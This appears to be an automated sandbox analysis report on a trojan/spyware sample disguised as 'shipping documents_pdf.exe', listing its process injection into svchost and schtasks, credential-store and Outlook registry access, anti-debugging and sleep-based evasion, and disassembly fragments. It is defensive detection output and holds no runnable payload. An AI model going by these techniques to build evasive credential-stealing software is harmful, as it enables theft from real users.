Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/8

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\ectosphere

Jump to behavior

Source: shipping documents_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: schtasks.exe, 00000004.00000002.3513571976.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN@+]ENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: schtasks.exe, 00000004.00000002.3513571976.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2065695531.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: shipping documents_pdf.exe	ReversingLabs: Detection: 23%
Source: shipping documents_pdf.exe	Virustotal: Detection: 32%

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

File read: C:\Users\user\Desktop\shipping documents_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\shipping documents_pdf.exe "C:\Users\user\Desktop\shipping documents_pdf.exe"
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents_pdf.exe"
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: shipping documents_pdf.exe

Static file information: File size 1401815 > 1048576

Source:	Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1856978950.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1856978950.0000000000849000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811498735.00000000007EE000.00000002.00000001.01000000.00000004.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3513782803.00000000007EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping documents_pdf.exe, 00000000.00000003.1713864417.0000000004430000.00000004.00001000.00020000.00000000.sdmp, shipping documents_pdf.exe, 00000000.00000003.1714725972.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791914003.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1793997709.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1888639333.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1890606069.0000000002B50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping documents_pdf.exe, 00000000.00000003.1713864417.0000000004430000.00000004.00001000.00020000.00000000.sdmp, shipping documents_pdf.exe, 00000000.00000003.1714725972.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1888759141.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791914003.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1793997709.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.3514938661.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1888639333.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1890606069.0000000002B50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.3513571976.0000000000573000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3516006037.000000000332C000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.00000000208FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1856978950.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1856978950.0000000000849000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.3513571976.0000000000573000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3516006037.000000000332C000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.00000000208FC000.00000004.80000000.00040000.00000000.sdmp

Source: shipping documents_pdf.exe

Static PE information: real checksum: 0xa2135 should be: 0x15b5ba

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041185C push ebp; retf	1_2_0041185D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414862 push ss; ret	1_2_00414865
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040691A push FFFFFFC2h; retf	1_2_0040691C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418AAC push es; ret	1_2_00418AC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403330 push eax; ret	1_2_00403332
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004163C3 push esi; iretd	1_2_004163E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415CDE push ebx; ret	1_2_00415CF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404C82 push ds; ret	1_2_00404C86
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041555B push eax; retf	1_2_0041555F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411720 push ebx; retf	1_2_0041174B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx	1_2_02F309B6
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A2AA4C push D06BF866h; retf	2_2_02A2AA51
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A34B67 push ebx; retf	2_2_02A34B92
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A2A8F9 push ebp; retf	2_2_02A2A91D
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A280C9 push ds; ret	2_2_02A280CD
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A3980A push esi; iretd	2_2_02A3982F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A389A2 push eax; retf	2_2_02A389A6
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A39125 push ebx; ret	2_2_02A3913C
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A2A951 push ebp; retf	2_2_02A2A91D
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A3BEF3 push es; ret	2_2_02A3BF10
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A34CA3 push ebp; retf	2_2_02A34CA4
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A37CA9 push ss; ret	2_2_02A37CAC
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A29D61 push FFFFFFC2h; retf	2_2_02A29D63
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D309AD push ecx; mov dword ptr [esp], ecx	4_2_02D309B6
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00413090 push esi; iretd	4_2_004130B5
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00412228 push eax; retf	4_2_0041222C
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0040E3ED push ebx; retf	4_2_0040E418
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0040E529 push ebp; retf	4_2_0040E52A
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0041152F push ss; ret	4_2_00411532
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_004035E7 push FFFFFFC2h; retf	4_2_004035E9
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0041B632 push cs; ret	4_2_0041B6F1

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"

Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\shipping documents_pdf.exe	API/Special instruction interceptor: Address: 418B274
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\schtasks.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417CED rdtsc

1_2_00417CED

Source: C:\Windows\SysWOW64\schtasks.exe

Window / User API: threadDelayed 9836

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\schtasks.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\schtasks.exe TID: 5840	Thread sleep count: 137 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe TID: 5840	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe TID: 5840	Thread sleep count: 9836 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe TID: 5840	Thread sleep time: -19672000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe TID: 2032	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe TID: 2032	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\schtasks.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\schtasks.exe

Code function: 4_2_0041C2E0 FindFirstFileW,FindNextFileW,FindClose,

4_2_0041C2E0

Source: schtasks.exe, 00000004.00000002.3513571976.0000000000573000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514069598.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2177904539.00000253A08DE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417CED rdtsc

1_2_00417CED

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417533 LdrLoadDll,

1_2_00417533

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF2F8 mov eax, dword ptr fs:[00000030h]	1_2_02FEF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F292FF mov eax, dword ptr fs:[00000030h]	1_2_02F292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED mov eax, dword ptr fs:[00000030h]	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]	1_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]	1_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]	1_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02F2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02F2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02F2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5F2D0 mov eax, dword ptr fs:[00000030h]	1_2_02F5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5F2D0 mov eax, dword ptr fs:[00000030h]	1_2_02F5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F392C5 mov eax, dword ptr fs:[00000030h]	1_2_02F392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F392C5 mov eax, dword ptr fs:[00000030h]	1_2_02F392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005341 mov eax, dword ptr fs:[00000030h]	1_2_03005341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB92BC mov eax, dword ptr fs:[00000030h]	1_2_02FB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB92BC mov eax, dword ptr fs:[00000030h]	1_2_02FB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB92BC mov ecx, dword ptr fs:[00000030h]	1_2_02FB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB92BC mov ecx, dword ptr fs:[00000030h]	1_2_02FB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]	1_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]	1_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F452A0 mov eax, dword ptr fs:[00000030h]	1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F452A0 mov eax, dword ptr fs:[00000030h]	1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F452A0 mov eax, dword ptr fs:[00000030h]	1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F452A0 mov eax, dword ptr fs:[00000030h]	1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF92A6 mov eax, dword ptr fs:[00000030h]	1_2_02FF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF92A6 mov eax, dword ptr fs:[00000030h]	1_2_02FF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF92A6 mov eax, dword ptr fs:[00000030h]	1_2_02FF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF92A6 mov eax, dword ptr fs:[00000030h]	1_2_02FF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC62A0
